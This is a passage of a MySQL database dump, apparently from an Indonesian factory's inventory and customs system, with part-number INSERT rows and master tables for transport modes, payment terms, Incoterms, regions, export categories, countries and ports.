'', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0039', '11', '', 'WK14080', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0040', '11', '', 'WK78660', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0041', '11', '', 'WK79870 BA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0042', '11', '', 'WK79870 MF', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0043', '11', '', 'WK79880 ( L )', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0044', '11', '', 'WK79940 ( R )', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0045', '11', '', 'WM14970', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0046', '11', '', 'WM14980', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0047', '11', '', 'WM47210', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0048', '11', '', 'WM69000', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0049', '11', '', 'WM69020', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0050', '11', '', 'WM69030', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0051', '11', '', 'WM83390', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0052', '11', '', 'WN12150', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0053', '11', '', 'WN13310', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0054', '11', '', 'WN53320', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0055', '11', '', 'WP01280', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0056', '11', '', 'WP20300', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0057', '11', '', 'WP20580', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0058', '11', '', 'WP20600', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0059', '11', '', 'WP21310', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0060', '11', '', 'WP22570', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0061', '11', '', 'WP22630', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0062', '11', '', 'WP22700 BA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0063', '11', '', 'WP22700 MF', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0064', '11', '', 'WP27730', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0065', '11', '', 'WP93120', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0066', '11', '', 'WP93130', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0067', '11', '', 'WP93140', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0068', '11', '', 'WP93150', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0069', '11', '', 'WS08710', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0070', '11', '', 'WS39620', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0071', '11', '', 'WT46090', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0072', '11', '', 'WT46110', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0073', '11', '', 'WT87950', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0074', '11', '', 'WT87970', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0075', '11', '', 'WU12800', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0076', '11', '', 'WU13170', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0077', '11', '', 'WU30150', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0078', '11', '', 'WV38420', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0079', '11', '', 'WV50980', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0080', '11', '', 'WV50990', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0081', '11', '', 'WW31910', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0082', '11', '', 'WY91820', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0083', '11', '', 'ZC89370', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0084', '11', '', 'ZA88180', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0085', '11', '', 'ZA99150', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0086', '11', '', 'ZE26630', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0087', '11', '', 'ZF38310', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0088', '11', '', 'ZF38320', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0089', '11', '', 'ZF38330', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0090', '11', '', 'ZF38340', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0091', '11', '', 'ZE63230', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYA-0092', '11', '', 'ZF60070', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YMMA'); INSERT INTO mst_barang VALUES ('WYI-0001', '11', '', 'V696570', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('WYI-0002', '11', '', 'V986330', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('WYI-0003', '11', '', 'V986680', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('WYI-0004', '11', '', 'WA10780BA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('WYI-0005', '11', '', 'WA10780MF3mm', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('WYI-0006', '11', '', 'WB27950BA(t=3mm)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('WYI-0007', '11', '', 'WB27950MF(t=3mm)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('WYI-0008', '11', '', 'WB27960BA(t=3mm)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('WYI-0009', '11', '', 'WB27960MF(t=3mm)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('WYI-0010', '11', '', 'WB96410', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('WYI-0011', '11', '', 'WD58680', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('WYI-0012', '11', '', 'WF33690', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('WYI-0013', '11', '', 'WF60800', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('WYI-0014', '11', '', 'WF85590', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('WYI-0015', '11', '', 'WH79060', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('WYI-0016', '11', '', 'WK12380BA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('WYI-0017', '11', '', 'WK12380MF', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('WYI-0018', '11', '', 'WK87830', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('WYI-0019', '11', '', 'WK87850', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('WYI-0020', '11', '', 'WP49440', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('WYI-0021', '11', '', 'WY74640', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('WYI-0022', '11', '', 'WY74650', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('WYI-0023', '11', '', 'ZC64240-0', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('WYI-0024', '11', '', 'ZD93680', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('WYI-0025', '11', '', 'ZD21910', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('WYI-0026', '11', '', 'ZD21920', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('WYI-0027', '11', '', 'ZD55040', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('WYI-0028', '11', '', 'ZD22000', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('WYI-0029', '11', '', 'ZD91900', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); INSERT INTO mst_barang VALUES ('WYI-0030', '11', '', 'ZD91920', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'YEMI'); -- ---------------------------- -- Table structure for `mst_caraangkut` -- ---------------------------- DROP TABLE IF EXISTS `mst_caraangkut`; CREATE TABLE `mst_caraangkut` ( `KdCrAngkut` tinyint(1) NOT NULL, `NmCrAngkut` varchar(20) DEFAULT NULL, PRIMARY KEY (`KdCrAngkut`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of mst_caraangkut -- ---------------------------- INSERT INTO mst_caraangkut VALUES ('1', 'Laut'); INSERT INTO mst_caraangkut VALUES ('2', 'Kereta Api'); INSERT INTO mst_caraangkut VALUES ('3', 'Jalan Raya'); INSERT INTO mst_caraangkut VALUES ('4', 'Udara'); INSERT INTO mst_caraangkut VALUES ('5', 'POS'); INSERT INTO mst_caraangkut VALUES ('6', 'Multimoda'); INSERT INTO mst_caraangkut VALUES ('7', 'Instalasi / Pipa'); INSERT INTO mst_caraangkut VALUES ('8', 'Sungai'); INSERT INTO mst_caraangkut VALUES ('9', 'Lainnya'); -- ---------------------------- -- Table structure for `mst_carabayar` -- ---------------------------- DROP TABLE IF EXISTS `mst_carabayar`; CREATE TABLE `mst_carabayar` ( `KdCrBayar` tinyint(1) NOT NULL DEFAULT '0', `CrBayar` varchar(20) DEFAULT NULL, PRIMARY KEY (`KdCrBayar`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of mst_carabayar -- ---------------------------- INSERT INTO mst_carabayar VALUES ('1', 'Dilakukan dimuka'); INSERT INTO mst_carabayar VALUES ('2', 'Kemudian'); INSERT INTO mst_carabayar VALUES ('3', 'Sight Letter of Cred'); INSERT INTO mst_carabayar VALUES ('4', 'Usance Letter of Cre'); INSERT INTO mst_carabayar VALUES ('5', 'Red Clause Letter of'); INSERT INTO mst_carabayar VALUES ('6', 'Wesel Inkaso'); INSERT INTO mst_carabayar VALUES ('7', 'Konsinyasi'); INSERT INTO mst_carabayar VALUES ('8', 'Interoffice Account'); INSERT INTO mst_carabayar VALUES ('9', 'Lainnya'); -- ---------------------------- -- Table structure for `mst_caradagang` -- ---------------------------- DROP TABLE IF EXISTS `mst_caradagang`; CREATE TABLE `mst_caradagang` ( `KdCrDagang` tinyint(1) NOT NULL DEFAULT '0', `CrDagang` varchar(15) DEFAULT NULL, PRIMARY KEY (`KdCrDagang`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of mst_caradagang -- ---------------------------- INSERT INTO mst_caradagang VALUES ('1', 'Imbal dagang'); INSERT INTO mst_caradagang VALUES ('2', 'Lainnya'); -- ---------------------------- -- Table structure for `mst_caraserah_barang` -- ---------------------------- DROP TABLE IF EXISTS `mst_caraserah_barang`; CREATE TABLE `mst_caraserah_barang` ( `KdCrSerahBrg` varchar(3) NOT NULL DEFAULT '', `NmCrSerahBrg` varchar(30) DEFAULT NULL, `KetCrSerahBrg` varchar(50) DEFAULT NULL, PRIMARY KEY (`KdCrSerahBrg`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of mst_caraserah_barang -- ---------------------------- INSERT INTO mst_caraserah_barang VALUES ('CFR', 'Cost And Freight', 'diikuti nama pelabuhan bongkar'); INSERT INTO mst_caraserah_barang VALUES ('CIF', 'Cost, Insurance, And Freight', 'diikuti nama pelabuhan bongkar'); INSERT INTO mst_caraserah_barang VALUES ('CIP', 'Carriage and Insurance Paid To', null); INSERT INTO mst_caraserah_barang VALUES ('CPT', 'Carriage Paid To', 'nama pelabuhan tujuan'); INSERT INTO mst_caraserah_barang VALUES ('DAF', 'Delivered and Frontier', null); INSERT INTO mst_caraserah_barang VALUES ('DDP', 'Delivered Duty Paid', null); INSERT INTO mst_caraserah_barang VALUES ('DDU', 'Delivered Duty Unpai', 'nama pelabuhan tujuan'); INSERT INTO mst_caraserah_barang VALUES ('DEQ', 'Delivered Ex Quay', 'nama pelabuhan tujuan'); INSERT INTO mst_caraserah_barang VALUES ('DES', 'Delivered Ex Ship', 'nama pelabuhan tujuan'); INSERT INTO mst_caraserah_barang VALUES ('EXW', 'Ex Works', 'diikuti nama tempat/ pabrik penjual'); INSERT INTO mst_caraserah_barang VALUES ('FAS', 'Free Alongside Ship', 'nama pelabuhan muat'); INSERT INTO mst_caraserah_barang VALUES ('FCA', 'Free Carrier', null); INSERT INTO mst_caraserah_barang VALUES ('FOB', 'Free On Board', 'diikuti nama pelabuhan muat'); -- ---------------------------- -- Table structure for `mst_daerah` -- ---------------------------- DROP TABLE IF EXISTS `mst_daerah`; CREATE TABLE `mst_daerah` ( `KdDaerah` varchar(4) NOT NULL DEFAULT '', `NmDaerah` varchar(30) DEFAULT NULL, PRIMARY KEY (`KdDaerah`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of mst_daerah -- ---------------------------- INSERT INTO mst_daerah VALUES ('3100', 'Prov. D K I Jakarta'); INSERT INTO mst_daerah VALUES ('3200', 'Prov. Jawa Barat'); INSERT INTO mst_daerah VALUES ('3204', 'Soreang'); INSERT INTO mst_daerah VALUES ('3205', 'Garut, Jawa Barat'); INSERT INTO mst_daerah VALUES ('3213', 'Subang, Jawa Barat'); INSERT INTO mst_daerah VALUES ('3214', 'Purwakarta, Jawa Barat'); -- ---------------------------- -- Table structure for `mst_factory` -- ---------------------------- DROP TABLE IF EXISTS `mst_factory`; CREATE TABLE `mst_factory` ( `kode_fac` char(2) NOT NULL COMMENT 'kode pabrik', `nama_fac` varchar(50) NOT NULL, `alamat` varchar(200) NOT NULL, `telp` varchar(15) NOT NULL, `fax` varchar(15) NOT NULL, `nm_pimp` varchar(30) NOT NULL COMMENT 'nama pimpinan', `email` varchar(30) NOT NULL, PRIMARY KEY (`kode_fac`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of mst_factory -- ---------------------------- INSERT INTO mst_factory VALUES ('01', 'PT. YANJIN INDONESIA FACTORY', '', '', '', '', ''); -- ---------------------------- -- Table structure for `mst_in_type` -- ---------------------------- DROP TABLE IF EXISTS `mst_in_type`; CREATE TABLE `mst_in_type` ( `matin_type` varchar(1) NOT NULL DEFAULT '0', `matin_name` varchar(20) DEFAULT NULL, PRIMARY KEY (`matin_type`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of mst_in_type -- ---------------------------- INSERT INTO mst_in_type VALUES ('0', 'Purchase'); INSERT INTO mst_in_type VALUES ('1', 'Replacement'); INSERT INTO mst_in_type VALUES ('2', 'From Production'); -- ---------------------------- -- Table structure for `mst_jenisbarang` -- ---------------------------- DROP TABLE IF EXISTS `mst_jenisbarang`; CREATE TABLE `mst_jenisbarang` ( `KdJnsBarang` tinyint(2) NOT NULL DEFAULT '0', `JnsBarang` varchar(25) DEFAULT NULL, PRIMARY KEY (`KdJnsBarang`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of mst_jenisbarang -- ---------------------------- INSERT INTO mst_jenisbarang VALUES ('0', 'Barang Jadi'); INSERT INTO mst_jenisbarang VALUES ('1', 'Bahan Baku'); INSERT INTO mst_jenisbarang VALUES ('2', 'Bahan Penolong'); INSERT INTO mst_jenisbarang VALUES ('3', 'Mesin/Sparepart'); INSERT INTO mst_jenisbarang VALUES ('4', 'Peralatan Pabrik'); INSERT INTO mst_jenisbarang VALUES ('5', 'Peralatan Perkantoran'); INSERT INTO mst_jenisbarang VALUES ('6', 'Peralatan Kontruksi'); INSERT INTO mst_jenisbarang VALUES ('7', 'Brg Reimpor TPB'); INSERT INTO mst_jenisbarang VALUES ('8', 'Brg Contoh/Test'); INSERT INTO mst_jenisbarang VALUES ('9', 'Lainnya'); INSERT INTO mst_jenisbarang VALUES ('10', 'Lebih dr 1 Jenis Brg'); INSERT INTO mst_jenisbarang VALUES ('11', 'WIP'); INSERT INTO mst_jenisbarang VALUES ('12', 'Scrap'); -- ---------------------------- -- Table structure for `mst_jenisekspor` -- ---------------------------- DROP TABLE IF EXISTS `mst_jenisekspor`; CREATE TABLE `mst_jenisekspor` ( `KdJnsEkspor` tinyint(1) NOT NULL DEFAULT '0', `JnsEkspor` varchar(20) DEFAULT NULL, PRIMARY KEY (`KdJnsEkspor`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of mst_jenisekspor -- ---------------------------- INSERT INTO mst_jenisekspor VALUES ('1', 'Biasa'); INSERT INTO mst_jenisekspor VALUES ('2', 'Akan Diimpor Kembali'); INSERT INTO mst_jenisekspor VALUES ('3', 'Reekspor'); -- ---------------------------- -- Table structure for `mst_kategoriekspor` -- ---------------------------- DROP TABLE IF EXISTS `mst_kategoriekspor`; CREATE TABLE `mst_kategoriekspor` ( `KdKatEkspor` tinyint(2) NOT NULL DEFAULT '0', `KatEkspor` varchar(80) DEFAULT NULL, PRIMARY KEY (`KdKatEkspor`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of mst_kategoriekspor -- ---------------------------- INSERT INTO mst_kategoriekspor VALUES ('1', 'Umum'); INSERT INTO mst_kategoriekspor VALUES ('2', 'Kemudahan Impor Tujuan Ekspor (KITE) dengan pembeb'); INSERT INTO mst_kategoriekspor VALUES ('3', 'Kemudahan Impor Tujuan Eksporb (KITE) dengan pengembalian'); INSERT INTO mst_kategoriekspor VALUES ('4', 'Kemudahan Impor Tujuan Eksporb (KITE) dengan pembebasan dan pengembalian'); INSERT INTO mst_kategoriekspor VALUES ('5', 'Khusus barang kiriman'); INSERT INTO mst_kategoriekspor VALUES ('6', 'Khusus barang pindahan'); INSERT INTO mst_kategoriekspor VALUES ('7', 'Khusus barang perwakilan negara asing atau badan international'); INSERT INTO mst_kategoriekspor VALUES ('8', 'Khusus untuk keperluan ibadah untuk umum, sosial, pendidikan, kebudayaan '); INSERT INTO mst_kategoriekspor VALUES ('9', 'Khusus barang cinderamata'); INSERT INTO mst_kategoriekspor VALUES ('10', 'Khusus barang contoh'); INSERT INTO mst_kategoriekspor VALUES ('11', 'Khusus barang keperluan penelitian'); INSERT INTO mst_kategoriekspor VALUES ('12', 'Tempat Penimbunan Berikat (TPB) dari Kawasan Berikat'); INSERT INTO mst_kategoriekspor VALUES ('13', 'Tempat Penimbunan Berikat (TPB) dari Gudang Berikat'); INSERT INTO mst_kategoriekspor VALUES ('14', 'Tempat Penimbunan Berikat (TPB) dari Tempat Pameran Berikat'); INSERT INTO mst_kategoriekspor VALUES ('15', 'Tempat Penimbunan Berikat (TPB) dari Toko Bebas Bea'); INSERT INTO mst_kategoriekspor VALUES ('16', 'Tempat Penimbunan Berikat (TPB) dari Tempat Lelang Berikat'); INSERT INTO mst_kategoriekspor VALUES ('17', 'Tempat Penimbunan Berikat (TPB) dari Kawasan Daur Ulang Berikat'); -- ---------------------------- -- Table structure for `mst_lokasiperiksa` -- ---------------------------- DROP TABLE IF EXISTS `mst_lokasiperiksa`; CREATE TABLE `mst_lokasiperiksa` ( `KdLokPeriksa` tinyint(1) NOT NULL DEFAULT '0', `LokPeriksa` varchar(25) DEFAULT NULL, PRIMARY KEY (`KdLokPeriksa`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of mst_lokasiperiksa -- ---------------------------- INSERT INTO mst_lokasiperiksa VALUES ('1', 'Kawasan Pabean'); INSERT INTO mst_lokasiperiksa VALUES ('2', 'Luar Kawasan Pabean'); -- ---------------------------- -- Table structure for `mst_negara` -- ---------------------------- DROP TABLE IF EXISTS `mst_negara`; CREATE TABLE `mst_negara` ( `KdNegara` varchar(2) NOT NULL DEFAULT '', `NmNegara` varchar(20) DEFAULT NULL, PRIMARY KEY (`KdNegara`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of mst_negara -- ---------------------------- INSERT INTO mst_negara VALUES ('CN', 'Cina'); INSERT INTO mst_negara VALUES ('ID', 'Indonesia'); INSERT INTO mst_negara VALUES ('JP', 'Jepang'); INSERT INTO mst_negara VALUES ('KR', 'Korea, Republic Of'); INSERT INTO mst_negara VALUES ('US', 'United States'); -- ---------------------------- -- Table structure for `mst_out_type` -- ---------------------------- DROP TABLE IF EXISTS `mst_out_type`; CREATE TABLE `mst_out_type` ( `matout_type` varchar(1) NOT NULL DEFAULT '0', `matout_name` varchar(20) DEFAULT NULL, PRIMARY KEY (`matout_type`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of mst_out_type -- ---------------------------- INSERT INTO mst_out_type VALUES ('0', 'Consumption'); INSERT INTO mst_out_type VALUES ('1', 'Return'); INSERT INTO mst_out_type VALUES ('2', 'From Production'); -- ---------------------------- -- Table structure for `mst_pelabuhan` -- ---------------------------- DROP TABLE IF EXISTS `mst_pelabuhan`; CREATE TABLE `mst_pelabuhan` ( `KdPelabuhan` varchar(5) NOT NULL DEFAULT '', `NmPelabuhan` varchar(20) DEFAULT NULL, PRIMARY KEY (`KdPelabuhan`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of mst_pelabuhan -- ---------------------------- INSERT INTO mst_pelabuhan VALUES ('IDTPP', 'Tanjung Priok'); INSERT INTO mst_pelabuhan VALUES ('KRPUS', 'Busan (ex Pusan)'); INSERT INTO mst_pelabuhan VALUES ('USFAT', 'Fresno'); -- ---------------------------- -- Table structure for `mst_penggunaanbarang` -- ---------------------------- DROP TABLE IF EXISTS `mst_penggunaanbarang`; CREATE TABLE `mst_penggunaanbarang` ( `KdGuna` varchar(1) NOT NULL DEFAULT '', `NmGuna` varchar(35) DEFAULT NULL, PRIMARY KEY (`KdGuna`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of mst_penggunaanbarang -- ---------------------------- INSERT INTO mst_penggunaanbarang VALUES ('1', 'Barang Berhubungan Langsung'); INSERT INTO mst_penggunaanbarang VALUES ('2', 'Barang Tidak Berhubungan Langsung'); INSERT INTO mst_penggunaanbarang VALUES ('3', 'Barang Konsumsi'); INSERT INTO mst_penggunaanbarang VALUES ('4', 'Hasil Olahan'); INSERT INTO mst_penggunaanbarang VALUES ('5', 'Barang Lainnya'); -- ---------------------------- -- Table structure for `mst_penimbunan` -- ---------------------------- DROP TABLE IF EXISTS `mst_penimbunan`; CREATE TABLE `mst_penimbunan` ( `KdTimbun` varchar(5) NOT NULL DEFAULT '', `NmTimbun` varchar(20) DEFAULT NULL, PRIMARY KEY (`KdTimbun`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of mst_penimbunan -- ---------------------------- INSERT INTO mst_penimbunan VALUES ('UTPK', 'UTPK III'); -- ---------------------------- -- Table structure for `mst_perusahaan` -- ---------------------------- DROP TABLE IF EXISTS `mst_perusahaan`; CREATE TABLE `mst_perusahaan` ( `NmPrshn` varchar(50) NOT NULL DEFAULT '', `TpPrshn` enum('o','c','s','p') DEFAULT NULL COMMENT '''o''=Owner, ''c''=Customer/Buyer, ''s''=Supplier,''p''=PPJK', `NpwpPrshn` varchar(30) DEFAULT NULL, `AlmtPrshn` varchar(100) DEFAULT NULL, `AlmtPrshn2` varchar(100) DEFAULT NULL, `Kota` varchar(20) DEFAULT NULL, `Prov` varchar(20) DEFAULT NULL, `Negara` varchar(20) DEFAULT NULL, `fax` varchar(30) DEFAULT NULL, `tlp` varchar(30) DEFAULT NULL, `Status` int(1) DEFAULT NULL, `StatusKB` enum('KB','Non KB') DEFAULT NULL, `NoTpb` varchar(50) DEFAULT NULL, `TgTpb` date DEFAULT NULL, `Niper` varchar(50) DEFAULT NULL, `NoTDP` varchar(10) DEFAULT NULL, `TgTDP` date DEFAULT NULL, `Cp` varchar(30) DEFAULT NULL, `NipCp` varchar(20) DEFAULT NULL, `NoPokokPpjk` varchar(20) DEFAULT NULL, `TgPokokPpjk` date DEFAULT NULL, `KdApi` enum('1','2') DEFAULT NULL, `NoApi` varchar(15) DEFAULT NULL, `KdPengguna` varchar(6) DEFAULT NULL, `NoReg1` varchar(6) DEFAULT NULL, `NoReg2` varchar(6) DEFAULT NULL, `KpbcPengawas` varchar(6) DEFAULT NULL, `NmPejabat` varchar(30) DEFAULT NULL, `NipPejabat` varchar(20) DEFAULT NULL, `Valuta` varchar(3) DEFAULT NULL, PRIMARY KEY (`NmPrshn`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- 